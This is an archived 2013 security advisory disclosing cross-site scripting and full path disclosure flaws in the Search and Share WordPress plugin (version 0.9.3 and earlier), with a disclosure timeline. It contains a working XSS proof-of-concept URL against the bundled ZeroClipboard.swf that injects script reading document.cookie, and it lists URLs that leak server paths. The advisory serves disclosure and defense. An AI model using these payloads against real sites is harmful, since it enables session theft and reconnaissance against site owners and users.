Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29526
HistoryJul 08, 2013 - 12:00 a.m.

XSS and FPD vulnerabilities in Search and Share for WordPress

2013-07-0800:00:00
vulners.com
10
JSON

Hello 3APA3A!

I want to inform you about vulnerabilities in Search and Share plugin for WordPress.

These are Cross-Site Scripting and Full path disclosure vulnerabilities. These XSS holes are in ZeroClipboard.swf, which is used in the plugin. In February I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103) and in multiple web applications.

Affected products:

Vulnerable are Search and Share 0.9.3 and previous versions.

Affected vendors:

Latent Motion
http://www.latentmotion.com

Details:

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into clipboard.

http://site/wp-content/plugins/search-and-share/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Full path disclosure (WASC-13):

http://site/wp-content/plugins/search-and-share/SearchAndShare.php

http://site/wp-content/plugins/search-and-share/error_log (leakage of full paths at web sites where showing errors is off and they are saving into error_log)

Timeline:

2013.02.18 - informed old and new developers of ZeroClipboard.
2013.03.26 - announced at my site.
2013.03.27 - informed developers of Search and Share.
2013.05.11 - disclosed at my site (http://websecurity.com.ua/6394/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON